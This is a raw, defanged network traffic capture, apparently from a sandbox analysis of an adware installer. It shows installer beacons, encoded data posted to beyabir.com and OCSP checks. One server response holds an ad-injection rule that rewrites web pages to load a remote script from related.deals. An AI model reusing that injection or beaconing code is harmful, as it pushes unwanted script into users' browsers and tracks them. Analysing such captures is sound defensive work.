0... ........"hXXp://crl.godaddy.com/repository/0...*.H...........
<<< skipped >>>


GET /services/stores?dummy=593 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Content-Encoding: gzip
14b............mRAr. ...1.'.8.[..6.v_.%-....#....R..r[.Q'D.{..z.....Q.
..U..8..\...I.MN!.-.... [email protected].<z[...:cg\....Y.lh..l...{%../H.|..aT
..l...;?-...k..UO.BMw)C.f..*..Q..bu.!.I.5...!.....y.HY.......... H.7..
2.NX)g..$lxp....A..J/D..R..$...0...J.!R.K.D~.D.l.V..E.v4..-..P$.....R.
BE...<.(*..;.....5..e.......8........9.g......O..4_].he......0..ont>....


GET /services/rules?dummy=865 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.crea
teElement("script");cbS.setAttribute("type","text/javascript");cbS.set
Attribute("src", "hXXp://related.deals/services/load.js");document.bod
y.appendChild(cbS);</script></body>.{cashReminder_instID}|
{instID}.....


GET /services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:22 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-
Headers: X-Requested-With..Access-Control-Allow-Credentials: true..



GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 20
15 23:07:20 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"262.11 ms","message":"store 1 action and 0 u
pdate "}..0..



POST /YBRInternet/?v=5.0&c=1840466908 HTTP/1.1
Accept: */*
Host: os.beyabir.com
User-Agent: ICAS
Content-Length: 1404
Cache-Control: no-cache

0A0Czu0Y0B0RtN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0W0VzuyCtFtCtN0W0S0PzutCtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzutAyDyEtCtDzytCyCyCtBtN1L1B0A1Q1H1L1GzutCtN0T0KzutAzzyEtAtAzytN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0U0I0D0N1P2WzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0M0G0U0I0Dzu1RtDtAtBtB1T1R1QtGyD1PyD1QtGyEtB1OtDtG1StCyCtAtG1RyDzytC1P1PyC1O1OyD1SzytN0M0S0I0DzutBzzyDzztDtBtDzytAyDtGtBtCyDyCzyzytByDyDtDtGtAyCyDzztCtAtCzztDyEtN0S0I0D0U0I0Dzu0A0AyDzy0FtDyEyBzztDzytCtCzztByC0D0AtD0A0AzyyD0C0ByEzz0AtCtCyD0FtN0M0A0C1V0LzutDtDyDtDyDyCtBtCtDtCyByEtOtA0AtCzytBtFtCyCzztFtCtAzytFtCtAyDtOtA0AyCtOtA0AtCtN0S0D0TzutBtDtCyDtDyDtDtCtDtBtDyBtDzytDtBzztN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0P0E1V0M0O0D0Ezu0D0L0LtN1I1L2ZzutAyDyCyBzzzytN1L1Q1B1RzutByBtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN1L1B0U1T1R0O1GzutDtN1L1B0U1B1P1C0A1Q1H1L1GzutCtN0R0N1T1H1Pzu0CtOtA0AtOyD0C0U1B1P1C1BtOyD0C1T1Q1HtOyD0C0A1E1E0D1T2Z1TtOyD0C0L1F1R1T1ItOyD0C0T1P1H1EtOyD0C0T1P1H1EtOyD0C0O1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2Z1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2ZtOyD0CtAtCtDyBtCyE1V1L1BtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyCtFtCtN0O0S0S0P0V1P1CzutCtN0O0S2VyCyEzutCtN0P0P0Nzu1TtCtDyC1RtAzz1PzyyCtCtBtByB1O1PyEtDtC1O1P1QtA1PtAyDyBtBzzyD1S1RtF1P2V1PtN0M1P1H0P1M0AzutCtAtByBtN0M1P1H0P1M0TzutBtDyEyBtN0M1P1H0V1L1C0AzutCzyyCyEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1Q1P1B1E1C1F2Z1P2Z1F1C
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 30 Apr 2015 23:07:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global1373
X-ICSCT-IP: 193.138.244.231
X-ICSCT-SERVER-NAME: ads.slave-128-eu-west-1b-c298b624
X-ICSCT-TIMESTAMP: 20150430180707062
X-ICSCT-VERSION: 1.2.8
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
1f00..w!..h...h.jq1.....~.....Q..NH...!.......$&..L......D.....c3.=4.a
.wlZ..=. .j:Hc.u.c....xJ<?j../x:..:;."..1......"U].7..IR......Lc..=
..7c!..p4H..-..p..EI.Ff.6qpZ..Zj..G.....C?.Q>.g.7.U.7...5.....>I
..f.oq.v.G......e6...9.?...)n6.T...%..Yu..w....!.5.%.-.35%.[.<0.9.q
...ao..J.......I.a.?ca..`!...T.....fR0.7i..3.\..}.6.)[email protected]%.....w..
..\kCX.S.Wf...5..t.........<....%gf.U.....9..5zf.tn._1|.a..4U_GA..;
.t{..c.x).LX)..}q".....EMr...q..cl.....L....1"..m..!cnr..h3....l.GG==K
.R.iR.[*...&...vt.. ....~.....Q....9..Kn.(....s..y..(.BZ.x..~m..'p..`0
..)....86..x.?.~...{{..9:..82.zN..E.3.......&..|=...a...9..x..RI...{08
p.r._)...i%.q.._.p<.5x..Z[[email protected],.......;..uO.[..
.5.?..{*......._.W92...J.L.s.992.TmC......Y0.u.?...?..)Z....Stl....2..
A. a|?wU.3..y....5..z..[I....)X#~p:.......g4.d6%...zd..g.8...q..&.....
W..p....b ...Y...O............c,.s.N.\[email protected][email protected].[
.3...n...h.;. ?.y9..|....4..y..r.........).g.......d.8r.E.O3@.{..8.. .
..F..=..0e...{.f."....K:..5. ,.r.......o.}.F.N*....A..Su...l...i..a.{.
 ..#..J4...iT...r..............4hX...=.a=.....T.h.f.st;.G,.z..^v..k..h
..O..x...n....8O...../o....b...G.QC...S!H]iL.. ..9n..|2.z.8....$..1../
...2..R..N......O.45.w...t.?].q5..>7;.".....*Y.B.w...X..,...f..6%..
[..>z`?x...*.)Esn....H....G...xzI#.J.A"...Ow...vr.."b....3../zd.h..
.......-......CO.U.`...IkM.uh...XC.%A.Tc:xY|t...Q....a.k.z..D....3h...
..-.7.._U.N.bk9..>.3..l.f....A2.5."......`.!...t!..t......|.F...k..
....$J....}x...%I.U..V1...e...f.n..p.NOU.uB....X.Q.a-....H@.......
<<< skipped >>>


GET /windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.theviilage.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
15............3............0..HTTP/1.1 200 OK..Server: nginx..Date: Th
u, 30 Apr 2015 23:08:35 GMT..Content-Type: text/html; charset=UTF-8..T
ransfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encodi
ng..X-Powered-By: PHP/5.2.14p1..Content-Encoding: gzip..15............
3............0..



POST /?pcrc=497235937&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 688
Cache-Control: no-cache

....V.....2$.....R...\... Q.\......1Xu..o .F....TT........y. ..)..z
.k..OIx.....9o1....J..!....A/....n2%.......|{")....Uq.w....hPT.d..U%...)DE.(.2..:SBy.W........A..k.S`.!.W..N.#.m.`g.\ST..u....... .8l....?...K._J....QnUU..J,.#........?......m.FY...z.-.a..
..@..(.9._2tZ...0p.......b...`........rQ*?.V.,...
|[@U5O..............(...? .Mf...M..7M.,,...$..4.U..D]y..Y..d b,....:N@.]..-.YR......f.{.[5.1.).............S.:..}=.Um.I.cYa.......`...-.,Ha/...X.tB............ .~.....Z<u.uG...s.../............6...H.L...`.r....%.S.....W~.c...FR[....
..IPx6:d..).C...C.O1...{.~B.6w..}[email protected]..'.m../...?0....,[email protected]@.p...e..]p...
 ..X^.........K..6?...is_..|..WH.Tc...
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 30 Apr 2015 23:07:08 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1552
content-transfer-encoding: binary
Cache-Control: max-age=521950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 00:10:33 GMT
Expires: Thu, 7 May 2015 00:10:33 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... [email protected]
0001033Z0s0q0I0... .........z`.V.<N.v...TM)(.r...L_.6....a"I9....J.
8........c..uU..$.;.....20150430001033Z....20150507001033Z0...*.H.....
........e...E;....([email protected].....,.jPVAh..z...4..eL. ....2.G9.i}..
H..!.}..........<.w..0W......a...S.K)AR.h..N...V}.5:,..xE......n..j
n.:wg.h{....D.:-...~.7....L?..W...<.Vm..5.6o.g...3..=...f.R.W(.t.`.
. &.4:..d....K..K..A./.e.d..W..K=a..l......f...........0.......50..10.
.-0..........y.P}~.EY....T]. 0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1<0:..U...3Class 3 Public Primary Certification Auth
ority - G21:08..U...1(c) 1998 VeriSign, Inc. - For authorized use only
1.0...U....VeriSign Trust Network0...141202000000Z..151216235959Z0..1.
0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Ne
twork1?0=..U...6Symantec Class 3 PCA - G2 OCSP Responder Certificate 3
0.."0...*.H.............0..........6..]......w';.r........I..c..4.... 
.........TyW......hd_.....!C.k......SE<?o.H.. .me.c..9N.&....e.^-..
a.....i\:..*."..u...|....".Nf3.~.L...QW...p.....-]UV8U...J&.<./.G..
...I...4.T....#I*.i.E0\..~q$.I.......X?G....f.t......v.l.U.Ld.I...B...
..=...Sf...H.s.........0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. 
.........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.
com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0..
.0.1.0...U....TGV-B-2740...*.H............1.`...i.....H.C.i.9~.i..Z.r.
*$..(./.ag9.....J.Q.~.`.$?b..C....<.h.........d&....3.kV.....f.
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U= HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=565181, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 12:10:12 GMT
Expires: Thu, 7 May 2015 12:10:12 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0......%bn.$..5.......?'4....2015043
0121012Z0s0q0I0... ........N.E.~.?Q.n.j<a.....3...>c."t..d.1..#.
...M....=....x..":...K.....20150430121012Z....20150507121012Z0...*.H..
............B.l..8........Gs/........"..........G...{?.^....R..'...)..
........J...0.R.l..)........W.N........D...D.K.....C....y.<....Y.S.
...#93..B.}....6....%..3Sf... ...j..S=.,@....N.......[..%.yI_...1.....
.)....N{[email protected]{.D~.j~...{....0...0.
..0..........7.R.~|..r."....#0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of us
e at hXXps://VVV.verisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Cod
e Signing 2009 CA0...150401000000Z..150630235959Z0..1.0...U....US1.0..
.U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSi
gn Class 3 Code Signing 2009 OCSP Responder0.."0...*.H.............0..
........z..|..>.....5.Z ...2.C MWIH.5......M.\.... ...eW..`.B=..`:.
.R. ...Z.k.Y.....p@.(3.c....a.;..[E....J:'...`...B....M..&......{. (..
......%......^[v[....m....*.T.o&4..3.....3.........G...e)...'?.K..2s..
8=?..z.:..T..-.8R..8wv7*U.K..c...<s...]{.........6.?_...........0..
.0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www
.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS
 incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0.
..U........0... .....0......0"..U....0...0.1.0...U....TGV-B-34920...*.
H.............,..-......q3a........z....t;B.z.h...]...#}.6.,..YU..
<<< skipped >>>


GET /SL2 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/150814s/150814c.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: pcmega.go2cloud.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 30 Apr 2015 23:07:09 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/1.7.9
Content-Length: 43
Connection: keep-alive
GIF89a.............!.......,...........D..;..



GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:54 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120452, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT
Expires: Sat, 02 May 2015 10:25:06 GMT
ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20150430222506Z0l0j0B0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,............V....20150430222506Z....2015050
2102506Z0...*.H..............7y......\..b.H].W.]..}.$...R..&.1.0....&l
t;.Q.m......=......I..^..1...L.7..p.....E......#.UI....,P.4&.n....u!..
ep..xZb.V.v.R\.FpN .%.......C.9......U.)X.#..=o.^.G.k..U..{.^.$1tE..\.
..[.5..75....]....b..w..j....N.0.V...-vh......e..........L..N_.[KS....
%B.9".D....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1
.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 
..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure 
Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U...
.US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0).
.U..."Go Daddy Validation Authority - G20.."0...*.H.............0.....
....xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D...
.l=.HS.N......A..;HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:54 GMT
..Server: Apache..Content-Transfer-Encoding: Binary..Cache-Control: ma
x-age=120452, public, no-transform, must-revalidate..Last-Modified: Th
u, 30 Apr 2015 22:25:06 GMT..Expires: Sat, 02 May 2015 10:25:06 GMT..E
Tag: "e6664fd0595206b2ff0e579607b274885636c2c5"..Content-Length: 1788.
.Connection: close..Content-Type: application/ocsp-response..0........
..0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0
<<< skipped >>>


GET /s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..



GET /services/rules.txt?dummy=908 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>.....


GET /services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
Content-Length: 0
X-Cache: BYPASS
HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:23
 GMT..Content-Type: text/html..Connection: keep-alive..X-Powered-By: P
HP/5.5.15..P3P: CP="Potato"..Content-Length: 0..X-Cache: BYPASS..



GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 20
15 23:07:18 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.85 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"289.61 ms","message":"store 1 action and 0 u
pdate "}..0..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1453
content-transfer-encoding: binary
Cache-Control: max-age=552950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 08:45:10 GMT
Expires: Thu, 7 May 2015 08:45:10 GMT
Date: Thu, 30 Apr 2015 23:12:10 GMT
Connection: keep-alive
0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....2015043
0084510Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a.
.eR&.....Y.)..".\....20150430084510Z....20150507084510Z0...*.H........
.....S.F1....m^.f...(.Ss@*M`:_.GI.Y.I"..}M@........*....o9-.{2W..)'./.
A....VIl....Xy......#.J..!..z.Q...0.Z.W.e....{D...tm..=.(........W.3G.
t..mw....#tn%n.P...,...E.mD.N..P.b.qY..|.c.>..xBZ.J.l.G..wx.......y
[email protected].~.?.o.x.k.KB......6.....g.owYk........B(...D....0...0...0..3
......./...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSi
gn, Inc.1705..U....Class 3 Public Primary Certification Authority0...1
41202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corpora
tion1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA -
 G1 OCSP Responder Certificate 30.."0...*.H.............0..........'..
....Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; ).
....0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p.
.^|o....S..v.).)[email protected]#qh...u1T.].G0.]E...=._..
.... ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. 
.e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. ....
...0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0..
. .....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$
..H......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D..
.........e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,.
...
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=361763, public, no-transform, must-revalidate
Last-Modified: Tue, 28 Apr 2015 03:40:02 GMT
Expires: Tue, 5 May 2015 03:40:02 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..2015042
8034002Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
..M.s.Q~...@?j.......20150428034002Z....20150505034002Z0...*.H........
......>...|.#%....9.x.Fl.{.j..i.{<...B......5h..T.....<....).
nU,7.L.,UpM&F9~.....ye.wpA.W.(9...VO{R.".~.C..G.t.*B...L......D.tj....
[email protected]$...zL........{..G...............].A..z..:{.*&*..2Q
S..s..Nt3..G..CR..D...-.T....H...l.7\..z..:.E.}L.Yk.Zvc..[.....#0...0.
..0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of us
e at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Cod
e Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0
...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Term
s of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign C
